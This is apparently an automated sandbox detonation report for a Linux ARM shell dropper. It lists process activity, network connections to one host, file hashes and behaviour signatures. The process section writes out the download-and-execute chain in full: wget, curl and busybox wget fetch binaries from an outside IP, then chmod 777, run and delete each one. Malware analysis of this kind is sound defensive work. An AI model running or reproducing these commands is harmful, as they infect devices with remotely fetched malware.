| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
Processes
/tmp/d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh
[/tmp/d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/wget
[wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
Network
| Country | Destination | Domain | Proto |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| GB | 89.187.167.5:443 | tcp | |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
Files
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-28 03:22
Reported
2024-10-28 03:25
Platform
debian9-armhf-20240611-en
Max time kernel
52s
Max time network
57s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
